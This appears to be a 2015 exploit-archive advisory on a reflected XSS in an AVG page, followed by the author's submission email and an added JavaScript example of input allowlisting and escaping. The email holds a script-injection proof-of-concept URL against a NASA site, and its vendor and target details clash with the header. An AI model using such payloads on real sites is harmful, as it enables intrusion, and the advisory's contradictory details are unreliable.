# Exploit Title: AVG Subdomain XSS Vulnerability
# Google Dork: N/A
# Date: 2015/12/29
# Exploit Author: RootByte
# Vendor Homepage: http://webtuneup.avg.com/
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / FireFox
# CVE : N/A

~ # Vulnerable Location: http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html
~ # Variable: risk
~ # Using this script for XSS Vulnerability Testing : &searchParams={"lang":"en","pid":"pid","v":" vv"}
~ # Our final address is webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=&searchParams={"lang":"en","pid":"pid","v":" vv"}

# Discovered by: RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/

RootByte: Pentester | Security Researcher

-------- Original Message --------
Subject: AVG Subdomain XSS Vulnerability
Local Time: December 31 2015 10:10 am
UTC Time: December 31 2015 6:10 pm
From: RootByte@protonmail.com
To: submissions@packetstormsecurity.com

# Exploit Title : AVG Subdomain XSS Vulnerability
# Exploit Author : RootByte
# Date : 2015/12/29
# Tested on : FireFox
# Vendor HomePage : https://ghrc.nsstc.nasa.gov/
# Google Dork : use your brain
# Category : Web Application

~ # Vulnerable Location: http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html
~ # Variable: risk
~ # Using this script for XSS Vulnerability Testing : &searchParams={"lang":"en","pid":"pid","v":" vv"}
~ # Our final address is :https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E

# Discovered by : RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/

RootByte: Pentester | Security Researcher
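
Defensive handling of the two query parameters the advisory names (risk and searchParams), as an added example that is not part of the original submission and is not AVG's code. It assumes the page writes these values into HTML; the allowed risk tokens, the 64-character bound and all function names are hypothetical.

```javascript
// Added example: allowlist `risk`, parse `searchParams` strictly, and escape
// every dynamic value at output. Nothing here is taken from interstitial.html.

const ALLOWED_RISK = new Set(["low", "medium", "high"]); // hypothetical tokens
const ALLOWED_KEYS = ["lang", "pid", "v"];               // keys shown in the advisory
const MAX_LEN = 64;                                      // assumed upper bound

// Encode the characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Accept `risk` only when it is one of the expected tokens.
function parseRisk(params) {
  const risk = params.get("risk");
  return risk !== null && ALLOWED_RISK.has(risk) ? risk : null;
}

// Parse `searchParams` as JSON; keep only known, bounded string fields.
function parseSearchParams(params) {
  let parsed;
  try {
    parsed = JSON.parse(params.get("searchParams") ?? "{}");
  } catch {
    return {}; // malformed JSON is treated as absent
  }
  if (parsed === null || typeof parsed !== "object" || Array.isArray(parsed)) return {};
  const clean = {};
  for (const key of ALLOWED_KEYS) {
    const v = parsed[key];
    if (typeof v === "string" && v.length <= MAX_LEN) clean[key] = v;
  }
  return clean;
}

// Build the fragment; values that pass validation are still escaped on output.
function renderInterstitial(query) {
  const params = new URLSearchParams(query);
  const risk = parseRisk(params) ?? "unknown";
  const sp = parseSearchParams(params);
  return `<p class="risk">Risk: ${escapeHtml(risk)}</p>` +
         `<p class="meta">lang=${escapeHtml(sp.lang ?? "")} v=${escapeHtml(sp.v ?? "")}</p>`;
}
```

In a browser, assigning the validated values with textContent instead of building an HTML string removes the need for escapeHtml in that path.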